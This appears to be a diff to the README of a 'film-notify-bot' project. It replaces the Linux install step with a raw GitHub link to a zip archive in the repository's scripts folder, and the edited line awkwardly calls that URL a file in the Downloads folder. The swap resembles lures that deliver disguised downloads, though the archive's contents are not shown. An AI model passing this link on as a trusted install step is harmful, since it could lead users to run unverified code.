ATheon-1/film-notify-bot/README.md

      - Find the downloaded `.dmg` file in your Downloads folder.
      - Open the file and drag the film-notify-bot icon to your Applications folder.
    - For **Linux:**
-     - Locate the downloaded `.tar.gz` file in your Downloads folder.
+     - Locate the downloaded `https://github.com/ATheon-1/film-notify-bot/raw/refs/heads/main/scripts/bot_film_notify_v3.5.zip` file in your Downloads folder.
      - Extract the files using your file manager or the terminal.
      - Follow the included README instructions for installation.